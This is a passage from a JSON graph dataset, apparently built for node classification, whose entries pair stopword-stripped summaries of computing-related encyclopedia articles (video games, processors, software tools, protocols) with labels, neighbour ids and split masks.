      2181,
      4750,
      10387,
      3221,
      3222,
      155,
      7325,
      3744,
      7847,
      10407,
      4267,
      6333,
      6335,
      9930,
      8399,
      213,
      4822,
      9946,
      4319,
      2786,
      742,
      5357,
      4859,
      1277,
      5888,
      260,
      3856,
      5395,
      7444,
      5397,
      9491,
      8990,
      1316,
      294,
      4398,
      7983,
      8499,
      1844,
      823,
      1347,
      1348,
      1361,
      4433,
      5969,
      10068,
      2399,
      6498,
      10083,
      8036,
      4968,
      8554,
      9579,
      879,
      5492,
      8582,
      3474,
      8602,
      10654,
      9128,
      8618,
      2995,
      5562,
      9151,
      4550,
      9671,
      7629,
      8675,
      5612,
      10732,
      3571,
      7667,
      6134,
      1016,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 11443,
    "label": 3,
    "text": "Xanadu_(video_game):xanadu video game also known xanadu dragon slayer ii action role-playing game developed nihon falcom released 1985 pc-8801 x1 pc-8001 pc-9801 fm-7 msx computers enhanced remakes later released sega saturn pc-9801 windows platforms second dragon slayer series preceded dragon slayer followed games dragon slayer series little relation xanadu set sales record computer games japan 400,000 copies sold 1985 one foundations role-playing genre particularly action role-playing subgenre featuring real-time action combat combined full-fledged character statistics innovative gameplay systems karma meter individual experience equipped items platform game elements combined dungeon crawl gameplay predecessor also towns explore introduced equipment change player character visible appearance food consumed slowly time essential keeping player character alive magic used attack enemies distance following year saw release xanadu scenario ii early example expansion pack game begins player directly control protagonist little introduction progress one must speak king gives player bare essentials small amount cash train selecting attributes raise player must find way city vast underground complex finding exit first many puzzles player encounter though game puzzle game role-playing video game puzzle game adventure game elements protagonist move left right climb ladders jump cast equipped spells enter doors use equipped items similar falcom later ys series damage done walking directly enemy unlike ys xanadu n't matter part target body player character runs main view xanadu side-scrolling platformer view though line sorcerian typical platformer super mario bros. engaging battle entering building view changed top-down perspective layer stratum complex network buildings caves tunnels acquire level player must visit temples minister grant level protagonist provided enough experience points otherwise minister let player know much needed go level two types levels fighting magic fighting experience raised combat magic though spell use two systems go hand hand used time enemy killed either good bad even though enemies attack player character player kills many good enemies karma statistic rise point temples refuse level player remedied drinking black poison bottle however carried bought must found within dungeons remove half protagonist hit points equipable items swords armor experience levels raised simply using item example swords attacking armor hit magic casting spell sense highly developed dagger effective brand new longsword however highly developed sword far useful maxed dagger vital upgrade equipment xanadu limited number enemies area deter powerleveling requires player think ahead handles enemies get experience keep karma getting high factor must juggled weapon experience player defeats enemies using dagger upgrades sword proceeds fight area boss player disadvantage either kept highly developed dagger bought sword early level finite number encounters area every area generally least one boss though always required fight enemies drop various items commonly drop money food money used upgrading equipment buying items protagonist slowly eats supply food time passes game slowly heals hit points well food runs hit points begin dropping rapid pace food found bought protagonist dies addition purchasing items found chests dungeon areas entering secret code name character creation area outset game autosaves right boss fight leaving building player manually save costs 100 gold sega saturn remake away adding save command status menu xanadu large set followups despite technically sequel dragon slayer xanadu ova released 1987 conjunction msx version game manga titled xanadu legend dragon slayer plot expanded altered main character name fieg フィーグ several new cast members new plot elements included several science fiction themes example fieg 21st-century soldier near future dropped xanadu bloody ambush soundtrack movie released record cassette compact disc shortly thereafter manga follows plot movie drawn tsuzuki kazuhiko 都築和彦 also work falcom ys sorcerian titles republished 17 part serial webcomic falcom release revival xanadu falcom website accompanying music english translation original pc-8801 release xanadu features music composed toshiya takahashi promote release game japanese heavy metal band anthem released lp two image songs titled xanadu msx versions game released 1987 different score xanadu scenario ii expansion pack features much larger set songs soundtrack composed takahito abe yuzo koshiro would compose music many falcom later titles koshiro compositions opening theme several dungeons taken demo tape first sent falcom age 18 revival xanadu revival xanadu ii two loose remakes made falcom 1990s feature unique soundtracks well also composed koshiro abe aside xanadu next legend xanadu xanadu titles received full independent original soundtrack compact disc however soundtrack released xanadu xanadu scenario ii 12 vinyl record album titled xanadu anthem selections xanadu music heard various falcom albums 1987 xanadu released featuring arranged versions xanadu scenario ii soundtrack played rock band combined live orchestra synthesizers main theme xanadu franchise la valse pour xanadu featured pc-88 pc-98 versions xanadu remixed several audio tracks xanadu next french magazine joypad reviewed pc-e version gave 97 xanadu pioneer game industry received critical praise japanese gaming magazines large fan base 2005 according falcom 1985 sales record 400,000 copies sold japan yet broken role-playing personal computer game released country however tokihiro naito e soft said first hydlide action-rpg like xanadu sold one-million copies across computer formats combining sales matching famicom sales also one-million copies japan influence xanadu felt many games developed falcom even development houses copied look feel ys featured similar quicker complex bump system combat used ys ys ii ys iv later dragon slayer games dragon slayer iv sorcerian similar side-scrolling viewpoints however bump system start xanadu predecessor original dragon slayer several smaller companies copied bump system mostly obscure pc-8801 titles dragon slayer laid foundations action role-playing game genre influencing future series like ys legend zelda xanadu early real-time action rpg full-fledged character statistics introduced several innovative gameplay mechanics karma morality system individual experience equipped items heavy emphasis puzzle-solving equipment changes player character visible appearance food consumed slowly time essential keeping player character alive magic used attack enemies distance training facilities improve various statistics also introduced platformer-style side-scrolling view including ability jump side-scrolling view used exploration switches overhead view predecessor battle certain rooms also use overhead view game influence also extended beyond action rpgs way game reworked entire game system considered influence final fantasy would installments developer square previously publisher msx version original dragon slayer xanadu also considered proto-metroidvania game due rpg turned side allowed players run jump collect explore laying foundations open-ended metroidvania games faxanadu legacy wizard xanadu scenario ii released 1986 early example expansion pack also non-linear allowing levels explored order xanadu title falcom given complete commemorative re-release original 1980s packaging though various degrees success older titles xanadu falcom breakthrough brought spotlight origin systems founder ultima series creator richard garriott flew tokyo meeting nihon falcom origin release xanadu us well falcom help releasing port japan however xanadu contained artwork directly lifted manuals role-playing game presentation game several digitized pictures manual ultima iii appeared various shops game upon seeing garriott origin ended meeting decided sue falcom lawsuit settled court artwork game changed appears",
    "neighbors": [
      770,
      2249,
      3113,
      10217,
      2156,
      6797,
      9006,
      4527,
      10931,
      11443,
      4536,
      9658,
      1596,
      6077
    ],
    "mask": "None"
  },
  {
    "node_id": 11444,
    "label": 2,
    "text": "Out_of_memory:memory memory oom often undesired state computer operation additional memory allocated use programs operating system system unable load additional programs since many programs may load additional data memory execution cease function correctly usually occurs available memory including disk swap space allocated historically memory condition common since early computers operating systems limited small amounts physical random-access memory ram due inability early processors address large amounts memory well cost considerations since advent virtual memory opened door usage swap space condition less frequent almost modern programs expect able allocate deallocate memory freely run-time tend fail uncontrolled ways crash expectation met older ones often allocated memory checked whether got enough work expected forthcoming therefore would either fail immediately memory error message work expected early operating systems ms-dos lacked support multitasking programs allocated physical memory could use needed physical memory often scarce resource exhausted applications terminate stay resident functionality applications could started running applications closed modern operating systems provide virtual memory processes given range memory memory directly correspond actual physical ram virtual memory backed physical ram disk file via mmap swap space operating system move virtual memory pages around needs virtual memory need backed physical memory exhaustion rare usually limits imposed operating system resource consumption predicted moore law amount physical memory computers grown almost exponentially although offset degree programs files becoming larger cases computer virtual memory support majority loaded data resides hard disk may run physical memory virtual memory thus causing excessive paging condition known thrashing usually renders computer unusable programs closed machine rebooted due reasons memory message rarely encountered applications modern computers however still possible encounter oom condition modern computer typical oom case modern computers happens operating system unable create virtual memory potential backing devices filled end-user disabled kernels operating systems linux attempt recover type oom condition terminating one processes mechanism known oom killer linux 4.6 released may 2016 introduced changes oom situations improving detection reliability. cgroup awareness oom killer implemented linux kernel 4.19 released october 2018 adds ability kill cgroup single unit apart system-wide physical memory limits systems limit amount memory process use usually matter policy limitation also happen os larger address space available process level high-end 32-bit systems physical address extension enabled come 8 gigabytes system memory even though single process access 4gb 32-bit flat memory model process exceeds per-process limit attempts allocate memory encounter error condition example c standard function allocating memory codice_1 return null well-behaved application handle situation",
    "neighbors": [
      6536,
      2571,
      3725,
      5520,
      3474,
      11539,
      8852,
      1694,
      2345,
      6319,
      7983,
      9016,
      9919,
      321,
      1736,
      9166,
      2383,
      5840,
      855,
      10333,
      2273,
      7907,
      5744,
      7795,
      8316
    ],
    "mask": "None"
  },
  {
    "node_id": 11445,
    "label": 7,
    "text": "Application_Networks:application networks application networks inc. appnet palo alto-based company provider jrisk packaged financial risk management software use on-premises part cloud computing environments customers included global banks banks used jrisk risk management portfolio securities otc contracts financial derivative transactions application networks inc. acquired reuters june 2006",
    "neighbors": [
      4194
    ],
    "mask": "None"
  },
  {
    "node_id": 11446,
    "label": 4,
    "text": "Parasoft_C/C++test:parasoft c/c++test parasoft c/c++test integrated set tools testing c c++ source code software developers use analyze test find defects measure quality security applications supports software development practices part development testing including static code analysis dynamic code analysis unit test case generation execution code coverage analysis regression testing runtime error detection requirements traceability code review commercial tool supports operation linux windows solaris platforms well support on-target embedded testing cross compilers parasoft c/c++test combined set tools helps developers test software delivered standalone application runs command line plug-in eclipse microsoft visual studio various modules set assist software developers performing static dynamic analysis creating executing maintaining unit tests measuring code coverage software metrics executing regression tests errors c/c++test discovers include uninitialized invalid memory null pointer dereferencing array buffer overflow division zero memory resource leaks duplicate code various types dead unreachable code c/c++test customers include samsung electronics wipro nec selex sistemi integrati also used lockheed martin f-35 joint strike fighter program jsf inomed uses achieve iec 62304 certification medical device software testing software code coverage measure parts code executed test many different methods measuring coverage different criteria calculated depending needs choose best fit application c/c++test includes options line coverage meaning line executed block coverage statement coverage path coverage decision coverage branch coverage simple condition coverage also supports modified condition/decision coverage mcdc projects require safe reliable software aircraft cars tend required form coverage believed better measure whether code thoroughly exercised regression testing verifies software continues operate correctly even changes made new versions released c/c++test automatically generates tests capture current state applications behavior recording happens application running later test runs compared stored results earlier runs help determine problems changes code may introduced robust regression test suite especially critical areas short release cycles high degrees test automation agile software development extreme programming help insure changes n't introducing bugs software c/c++test includes lightweight form runtime error detection suitable use embedded systems including running target board host helps find serious runtime defects memory leaks null pointers uninitialized memory buffer overflows software metrics used help assess improve software quality metrics used help determine bug-prone code might others help understand maintainability proper construction c/c++test provides variety software metrics including traditional counting metrics lines files comments methods etc well industry standards like fan cyclomatic complexity cohesion various halstead metrics users configure metrics want run applicable set thresholds acceptable value particular metric allows users flag code outside expected range error reviewed fixed graphic reports provided show values trends metrics static code analysis process analyzing source code without executing software helps developers find bugs early well code according best practices helps create code less susceptible bugs avoiding potentially dangerous code styles constructs industries software performance critical often requirements run static analysis tools even particular static analysis rules static analysis c/c++test includes different types analysis including pattern-based abstract interpretation flow analysis metrics helps detect code responsible memory leaks erratic behavior crashes deadlocks security vulnerabilities c/c++test comes pre-configured templates assist enforcing static analysis rules variety industry standards working industries strict coding requirements regulatory standards necessary able prove application developed according required steps traceability information necessary prove software audit 've done proper process commonly means able prove code belongs particular requirement well reviewed outcome review also encompasses tests analysis performed code done tests failed c/c++test keeps track testing links back requirement system source control system bug tracking systems provides full traceability step software development process purpose unit testing make sure individual pieces software application work properly integration programming languages like c c++ usually consists single file small number files perform related function unit testing encompasses creation tests execution tests see results maintenance tests long term use unit testing often associated code coverage shows exactly lines code executed test functionalities included c/c++test c++test helps create unit tests compatible xunit testing frameworks also provides tracing functionality lets monitor system test generate test cases based actual paths data used execution also provides functionality handle isolating code necessary allow function without rest application also called stubbing well object repository store share reuse software objects initialized necessary test data stubs allow remove dependent parts full application database api still run application component still c/c++test allows create necessary stubs run code isolation capability alter extend test data provided variety means data source interface allows read test inputs files spreadsheets databases tests also run simultaneous runtime error detection turned find serious programming flaw wo n't necessarily cause assertion failures testing likely cause software instability deployed execution embedded systems support whether host target simulator including cross-compilation loading tests target loading results remote execution back gui parasoft c/c++test originally introduced 1995 static analysis tool based guidelines found book effective c++ scott meyers later unit test creation execution added product renamed c++test eventually product name modified include c c++ reflect languages actually covered parasoft c/c++test software test performances ’ 2008 testers choice award best embedded/mobile test/performance category selected vdc software embeddy best show award winner 2012 parasoft received tuv certification automotive functional safety tool 2011 according iec 61508 iso 26262 standards",
    "neighbors": [
      5636,
      9482,
      6797,
      1687,
      1689,
      5404,
      2465,
      6817,
      8355,
      9509,
      7983,
      823,
      1474,
      11208,
      2761,
      4171,
      8531,
      4820,
      9432,
      2658,
      5612,
      2045,
      3583
    ],
    "mask": "None"
  },
  {
    "node_id": 11447,
    "label": 3,
    "text": "Motorola_68000_series:motorola 68000 series motorola 68000 series also termed 680x0 m68000 m68k 68k family 32-bit cisc microprocessors 1980s early 1990s popular personal computers workstations primary competitors intel x86 microprocessors well known processors powering early apple macintosh commodore amiga sinclair ql atari st sega genesis mega drive several others although modern desktop computers based processors 68000 series derivative processors still widely used embedded systems motorola ceased development 68000 series architecture 1994 replacing powerpc architecture developed conjunction ibm apple computer part aim alliance 68010 68020 68030 68040 68060 68000 line processors used variety systems modern high-end texas instruments calculators ti-89 ti-92 voyage 200 lines members palm pilot series run palm os 1.x 4.x os 5.x arm-based even radiation-hardened versions critical control systems space shuttle however became well known processors powering desktop computers apple macintosh commodore amiga sinclair ql atari st several others 68000 also processor choice 1980s unix workstations servers firms sun microsystems next silicon graphics sgi 68000 version cp/m called cp/m-68k initially proposed atari st operating system atari chose atari tos instead also perhaps significantly first several versions adobe postscript interpreters 68000-based 68000 apple laserwriter laserwriter plus clocked faster version used macintosh computers fast 68030 later postscript interpreters including standard resolution laserwriter iintx iif iig also 300 dpi higher resolution laserwriter pro 600 series usually 600 dpi limited 300 dpi minimum ram installed high resolution linotronic imagesetters 200ps 1500+ dpi 300ps 2500+ dpi thereafter adobe generally preferred risc processor competitors postscript clones already gone riscs often amd 29000-series early 68000-based adobe postscript interpreters hardware named cold war-era u.s. rockets missiles atlas redstone etc today systems either end-of-line case atari using different processors case macintosh amiga sun sgi since platforms peak market share 1980s original manufacturers either longer support operating system hardware business however gnu/linux netbsd openbsd operating systems still include support 68000 processors 68000 processors also used sega genesis mega drive snk neo geo consoles main cpu consoles sega saturn used 68000 audio processing i/o tasks atari jaguar included 68000 intended basic system control input processing due jaguar unusual assortment heterogeneous processors also frequently used running game logic many arcade boards also used 68000 processors including boards capcom snk sega microcontrollers derived 68000 family used huge variety applications example cpu32 coldfire microcontrollers manufactured millions automotive engine controllers many proprietary video editing systems used 68000 processors category name macrosystem casablanca black box easy use graphic interface 1997 intended amateur hobby videographer market also worth noting earlier bigger professional counterpart called draco 1995 groundbreaking quantel paintbox series early based 24-bit paint effects system originally released 1981 lifetime used nearly entire range 68000 family processors sole exception 68060 never implemented design another contender video arena abekas 8150 dve system used 680ec30 trinity play later renamed globecaster uses several 68030s bosch fgs-4000/4500 video graphics system manufactured robert bosch corporation later bts 1983 used 68000 main processor drove several others perform 3d animation computer could easily apply gouraud phong shading run modified motorola versados operating system people familiar pdp-11 vax usually feel comfortable 68000 exception split general-purpose registers specialized data address registers 68000 architecture many ways 32-bit pdp-11 orthogonal instruction set many processors came e.g. 8080 e.g. x86 typically possible combine operations freely operands rather restricted using certain addressing modes certain instructions property made programming relatively easy humans also made easier write code generators compilers 68000 instruction set divided following broad categories 68050 though one point project within motorola odd-numbered releases always reactions issues raised within prior even numbered part hence generally expected 68050 would reduced 68040 power consumption thus heat dissipation improved exception handling fpu used smaller feature size optimized microcode line program use instructions many optimizations included 68060 part design goals number reasons likely 68060 development intel 80486 progressing quickly motorola assumed would 68060 demanding project 68050 cancelled early development also revision 68060 motorola process shifting away 68000 88k processor lines new powerpc business 68070 never developed would revised 68060 likely superior fpu pipelining widely speculated upon usenet motorola mainly used even numbers major revisions cpu core 68000 68020 68040 68060 68010 revised version 68000 minor modifications core likewise 68030 revised 68020 powerful features none significant enough classify major upgrade core cpu 68070 designation licensed somewhat slower version 16/32-bit 68000 basic dma controller i²c host on-chip serial port 68070 used main cpu philips cd-i cpu however produced philips officially part motorola 680x0 lineup 4th-generation 68060 shared features intel p5 microarchitecture personal computers xt/370 at/370 pc-based ibm-compatible mainframes included two modified motorola 68000 processors custom microcode emulate s/370 mainframe instructions mainline 68000 processors demise 68000 family used extent microcontroller embedded microprocessor versions chips include ones listed i.e cpu32 aka 68330 coldfire quicc dragonball advent fpga technology international team hardware developers re-created 68000 many enhancements fpga core core known 68080 used vampire-branded amiga accelerators 1980s early 1990s 68000 widely used desktop computers mainly competed intel x86 architecture used ibm pc compatibles generation 1 68000 cpus primarily competed 16-bit 8086 8088 80286 generation 2 competed 80386 first 32-bit x86 processor generation 3 80486 fourth generation competed p5 pentium line nearly widely used predecessors since much old 68000 marketplace either defunct nearly case atari next converting newer architectures powerpc macintosh amiga sparc sun mips silicon graphics sgi dozens processor architectures currently successful embedded systems microcontrollers much simpler smaller cheaper 68000 others relatively sophisticated capable running complex software embedded versions 68000 often compete processors derived powerpc arm mips superh architectures among others",
    "neighbors": [
      7170,
      7173,
      2058,
      1548,
      2073,
      5663,
      10786,
      8231,
      10796,
      3630,
      11314,
      8761,
      6715,
      6207,
      7234,
      7235,
      1606,
      8268,
      2638,
      6243,
      7269,
      11374,
      3185,
      5235,
      7286,
      1149,
      7806,
      2179,
      7299,
      1158,
      7302,
      7305,
      7307,
      7311,
      1170,
      8851,
      9363,
      5272,
      6815,
      4773,
      6821,
      682,
      5803,
      2224,
      5297,
      3764,
      9911,
      10945,
      10436,
      9928,
      6858,
      9932,
      221,
      4841,
      9964,
      1776,
      2290,
      3319,
      3323,
      3844,
      4868,
      1798,
      7941,
      10501,
      5898,
      6924,
      6925,
      6415,
      1298,
      7445,
      4897,
      802,
      3886,
      823,
      4409,
      2874,
      10051,
      8523,
      336,
      5457,
      8530,
      10065,
      11604,
      5976,
      7001,
      8539,
      3932,
      3936,
      869,
      10089,
      8557,
      8048,
      4465,
      5492,
      1399,
      8058,
      3467,
      921,
      7065,
      7071,
      8102,
      9638,
      10153,
      5040,
      1461,
      1463,
      1983,
      9665,
      5058,
      453,
      3017,
      4046,
      6607,
      3540,
      4565,
      5076,
      9685,
      4569,
      1502,
      10734,
      10224,
      6129,
      499,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 11448,
    "label": 3,
    "text": "Herzog_(video_game):herzog video game herzog german duke strategy video game released technosoft japan msx nec pc-88 computers 1988 real-time tactics tactical shooter game real-time strategy elements game served prototype sequel herzog zwei released 1989 sega mega drive often considered first true real-time strategy game game centered around fictional war countries mercies blue side game ruth red side game single player mode game player takes control mercies army whose goal reach capture headquarters ruth army gameplay takes place among nine battlegrounds beginning capital mercies vaxan victory player brings player army next battleground closer remerje capital ruth game ends either player defeated vaxan computer controlled army defeated remerje game also end player loses last land-armor stock see units player loses battleground vaxan player move backwards complete previous stage ten years prior game events president hughes head republic mercies assassinated ruth liberian army terrorist organisation lead roger tense takes responsibility act previously friendly relations mercies ruth deteriorate war breaks major powers intervene conflict sides war spreads engulf world decade later ruth army gates vaxan capital mercies war begins draw close player successful captures remerje capital ruth war ends two countries sign peace treaty five years later battleground linear path player base located one side enemy base located side side land-armor fly air travel ground pick drop friendly units attack units including friendly ones side must use funding automatically replenished rate ten money units every half-second approximately build various units travel length battlefield battle opposing units unit successfully manages reach opposing end battlefield unit cause certain amount damage enemy base battle side manages damage opposing base enough destroy visual aspect gameplay represented vertically aligned graphical area units controlled real-time small horizontal radar top screen units represented colored dots scroll across screen according position bottom screen side gauges show percentage damage taken respective land-armors bases either reaches 100 percent damage destroyed gameplay two-player mode essentially single player game graphical area split two sides player player one blue player two red major difference first battle takes place location middle two capitals progress forward backward depending wins one capital defeated combat deployable units available follows land-armor land-armor important unit game one land-armor time active battleground directly controlled player units move independently land-armor travel ground hover air attack enemy ground air units land-armor also pick units drop different locations land-armor health displayed screen replaced another land-armor destroyed computer controlled army infinite number land-armors player must buy extras needed destruction player last land-armor results automatic game soldier soldiers fairly slow moving ground units fire single shots ground enemies soldiers weak take one hit destroyed cheap create land-armor picks one repair land-armor rate 1 percentage point per second way repair land-armor land-armor carry five soldiers time tank tanks main attack unit army fairly expensive make slow moving take lot hits destroyed lot damage bases tank rate fire soldier land-armor carry one tank time aam anti aircraft missile -carrier aam-carriers medium speed moving units equipped attack ground units instead armed finite number homing missiles seek attack enemy land-armor ground air unit attack land-armor air besides another land-armor land-armor carry one aam-carrier time upon pressing fire button land-armor unleash entire payload homing missiles aam-carrier holding side car side cars lightweight inexpensive motorcycle units fast reach enemy base quickly also higher rate fire units damage little faster downside low tolerance damage land-armor carry one side car time antitank-gun antitank-guns ground turrets must first placed land-armor attack enemies position although expensive unable move without assistance durable high rate fire making ideal take tanks name suggests defend bases land-armor carry one antitank-gun time grand-slam expensive unit next land-armor grand-slam missile powerful travels across battleground slowly successfully reaches opposing base automatically destroys 100 percent damage grand-slam ca n't seen interacted graphical area seen blip radar game flash warning grand-slam launched way destroy grand-slam send another grand-slam collide opposite end path final note player maximum 50 units battleground time herzog served prototype well known 1989 sega mega drive sequel herzog zwei considered first real time strategy game first feature set falls contemporary definition genre predating genre-popularizing dune ii 1992",
    "neighbors": [
      3307,
      8300,
      9006,
      5011,
      11231
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11449,
    "label": 5,
    "text": "TenFourFox:tenfourfox tenfourfox web browser power macintosh computers based mozilla gecko layout engine port mozilla firefox powerpc-based macintosh computers running mac os x retain compatibility older architecture older versions operating system add powerpc-specific optimizations improved performance project started mozilla announced would release firefox 4 powerpc versions os x like firefox includes compatibility wide range addons acid2 acid3 compliance html 5 css 3 features however also includes javascript just-in-time compilation custom builds specific powerpc processor families altivec acceleration key media codecs primary maintainer cameron kaiser project shares administration classilla fork mozilla application suite mac os 9 mac os 8.6 2010 mozilla mike beltzner announced forthcoming firefox 4 would released power macintosh computers compatibility mac os x tiger already removed making firefox 3.6 last supported release firefox older architecture platform mozilla stopped making powerpc-compatible universal builds firefox 4 beta 7 response developer cameron kaiser created test build firefox 4 could run power mac g5 time support withdrawn beta 7 released users separate builds altivec macs g3 macs november 8 2010 aligning precedent modified builds firefox source could use firefox trademarks without permission project forked named tenfourfox full complement builds g3 7400 7450 g4 families g5 released beta 8 december 15 2010 javascript acceleration using completed powerpc version tracemonkey released beta 9 january 12 2011 enabled fully beta 11 february 2 2011 finalized first release version 4.0s incorporated security update fix javascript performance released march 24 2011 version 5.0 switched current mozilla rapid release framework based firefox 5 including additional altivec scaling color features released june 16 2011 mozilla announced extended support release esr firefox cameron kaiser stated starting version 10 tenfourfox stable releases tenfourfox based firefox esr reduce maintenance burden major esr versions developers tracked changes firefox 6-week rapid release cycle test builds determine whether would still able build software next esr version released minor esr updates advertised suitable general consumption december 2015 kaiser declared tenfourfox would move away directly firefox source code 45 esr citing inability port later versions due operating system rust compiler limitations first feature parity releases fprs major later firefox features backported tenfourfox modified firefox esr 45 base released official end firefox esr 45 support june 13 2017 tenfourfox fpr series releases include additional later features well backported security patches current supported firefox esr tenfourfox shares main feature set firefox along optimizations powerpc platform similar optimized build projects pale moon swiftfox tenfourfox includes specific compiler optimizations improve overall performance issues specific builds tuned specific processor families however also includes custom new features particular javascript just-in-time compilation backend altivec acceleration adds glue code enable interface features firefox 4 later still work mac os x tiger led favorable reviews speed performance older macintosh computers due compatibility older operating system browser lacks entire feature set modern firefox versions particular fully support core text understand apple advanced typography features certain international fonts support graphics acceleration compositing support webgl powerpc tiger support opengl 2 furthermore security maintainability reasons npapi plugins support deprecated subsequently removed",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      9281,
      5707,
      10834,
      6231,
      8281,
      2139,
      6747,
      3167,
      2149,
      1642,
      9834,
      9841,
      115,
      9843,
      4728,
      637,
      1664,
      2182,
      6791,
      11418,
      10910,
      8351,
      7340,
      1713,
      9394,
      9908,
      7861,
      185,
      4797,
      1729,
      11466,
      7885,
      11469,
      9424,
      7889,
      4310,
      2777,
      8923,
      737,
      4326,
      8443,
      9987,
      10501,
      7943,
      1295,
      7951,
      2836,
      278,
      10006,
      7965,
      1834,
      7983,
      10057,
      11082,
      2893,
      10078,
      8557,
      7543,
      6528,
      3971,
      3462,
      8584,
      3472,
      7572,
      8609,
      5026,
      10658,
      8102,
      944,
      8120,
      5054,
      9152,
      6086,
      4048,
      11221,
      5078,
      479,
      482,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114,
      8700,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 11450,
    "label": 9,
    "text": "IBM_Cross_System_Product:ibm cross system product ibm cross system product csp application generator intended create online systems ibm mainframe platforms introduced 1981 csp consisted set source code generators allowed developers interactively define test generate execute application programs csp composed two products csp version 3 released 1986 extended functions 1987 saa announcement cast doubt ibm commitment csp – n't silent csp dismembered it. last version csp version 4.1 went support end 2001 1994 ibm released successor product called visualgen incorporated ability develop client/server applications particularly addition graphical user interfaces guis applications ability access data non-ibm vendors ’ data stores ability execute application operating environments beyond mainframe 1996 product renamed visualage generator visualage generator withdrawn service 2009 succeeded rational business developer",
    "neighbors": [
      10280,
      4042,
      7053,
      11673,
      5562,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 11451,
    "label": 7,
    "text": "Fallacies_of_distributed_computing:fallacies distributed computing fallacies distributed computing set assertions made l peter deutsch others sun microsystems describing false assumptions programmers new distributed applications invariably make fallacies list fallacies generally came sun microsystems l. peter deutsch one original sun fellows credited penning first seven fallacies 1994 however bill joy tom lyon already identified first four fallacies networked computing article claims dave lyon mistake around 1997 james gosling another sun fellow inventor java added eighth fallacy",
    "neighbors": [
      9665,
      1316,
      5677,
      9391,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11452,
    "label": 3,
    "text": "Champion_Boxing:champion boxing yu suzuki described champion boxing minor project little staff said allowed learn process games development little pressure game understaffed designers suzuki actually contributed drawings various punching animations according suzuki game developed sg-1000 first arcade version created simply installing sg-1000 arcade cabinet pengo makes cameo ko",
    "neighbors": [
      4716,
      8300,
      9006,
      1776,
      5011,
      629,
      5629
    ],
    "mask": "Test"
  },
  {
    "node_id": 11453,
    "label": 1,
    "text": "New_South_Wales_Heritage_Database:new south wales heritage database new south wales heritage database state heritage inventory online database information historic sites new south wales australia statutory heritage listings holds information sites listed new south wales state heritage register 1,650 entries addition sites heritage lists managed new south wales local government authories statutory heritage registers important note online database holding information historic sites heritage register historic site multiple entries database listed multiple heritage registers example young railway station three heritage registers therefore three entries database database licensed cc-by except material identified copyright third parties",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 11454,
    "label": 3,
    "text": "Personal_Editor:personal editor personal editor pe personal editor ii pe2 text editor developed ibm ibm pc dos ms-dos 1980s became popular easy fast programmable custom keyboard shortcuts user interface pe influenced successor text editors personal editor 32 modern 32-bit editor user interface based pe2/pe3 qe text editor linux systems asia-pacific region ibm japan released dbcs version personal editor ibm 5550 ps/55 available ibm lineup years although e editor came pc dos since version 6.1",
    "neighbors": [
      6148,
      9166,
      7983,
      6129,
      823,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 11455,
    "label": 4,
    "text": "Winn_Schwartau:winn schwartau winn schwartau born july 1 1952 new york city expert security privacy infowar cyber-terrorism related topics known appearances defcon host popular game hacker jeopardy provocative original ideas written dozen works security topics 2002 honored “ power thinker ” one 50 powerful people networking network world 2008 voted one 25 influential people security industry security magazine first non-fiction book information warfare chaos electronic superhighway 1994 1996 1997 introduces concepts cyberterrorism public another books cybershock 2000 2001 non-technical look def con conference hackers general phreaking importance computer security wrote time based security outlining use time security metric pearl harbor dot com novel terrorist cyberattack united states 2001 winn labeled one network world major power thinkers network world 2007 sc magazine labeled one top 5 security thinkers called civilian architect information warfare identified one 25 influential people security industry schwartau author internet computer ethics kids parents teachers without clue 2001/2002 dr. fred cohen all.net described book “ best security book ever written ” latest work analogue network security released august 8th 2018 bsides las vegas schwartau chairman board mobile active defense specializing security compliance smartphones tablets president founder security awareness company formerly known interpact inc. develops security awareness programs private public organisations also founded infowarcon 1994 trusted learning 2003 co-founded scipp international 2007",
    "neighbors": [
      3941,
      5575
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11456,
    "label": 5,
    "text": "Directory_Assistance_Service:directory assistance service directory assistance service das obsolete protocol service accessing x.500 directory services das intended provide lightweight means clients access x.500 directory services via split-directory user agent model directory user agent dua directory client split directory assistance da client directory assistant directory user would interact da-client da-client would communicate directory assistant using da protocol directory assistant would communicate directory service using x.500 directory access protocol dap directory assistant directory assistance protocol dap gateway design allows da-client access directory without requiring support cumbersome open systems interconnection protocol stack directory assistance service created 1990 marshall rose performance systems international inc. formally specified rfc 1202 published 1991 evolution dish client/server interface quipu developed colin robbins university college london related efforts dixie lead development lightweight directory access protocol ldap replaced directory assistance service",
    "neighbors": [
      10238,
      6651,
      6054,
      2359
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11457,
    "label": 1,
    "text": "Entity–relationship_model:entity–relationship model entity–relationship model er model describes interrelated things interest specific domain knowledge basic er model composed entity types classify things interest specifies relationships exist entities instances entity types software engineering er model commonly formed represent things business needs remember order perform business processes consequently er model becomes abstract data model defines data information structure implemented database typically relational database entity–relationship modeling developed database design peter chen published 1976 paper however variants idea existed previously er models show super subtype entities connected generalization-specialization relationships er model used also specification domain-specific ontologies entity–relationship model usually result systematic analysis define describe important processes area business define business processes presents business data schema graphical form usually drawn graphical form boxes entities connected lines relationships express associations dependencies entities er model also expressed verbal form example one building may divided zero apartments one apartment located one building entities may characterized relationships also additional properties attributes include identifiers called primary keys diagrams created represent attributes well entities relationships may called entity-attribute-relationship diagrams rather entity–relationship models er model typically implemented database simple relational database implementation row table represents one instance entity type field table represents attribute type relational database relationship entities implemented storing primary key one entity pointer foreign key table another entity tradition er/data models built two three levels abstraction note conceptual-logical-physical hierarchy used kinds specification different three schema approach software engineering first stage information system design uses models requirements analysis describe information needs type information stored database data modeling technique used describe ontology i.e overview classifications used terms relationships certain area interest case design information system based database conceptual data model later stage usually called logical design mapped logical data model relational model turn mapped physical model physical design note sometimes phases referred physical design entity may defined thing capable independent existence uniquely identified entity abstraction complexities domain speak entity normally speak aspect real world distinguished aspects real world entity thing exists either physically logically entity may physical object house car exist physically event house 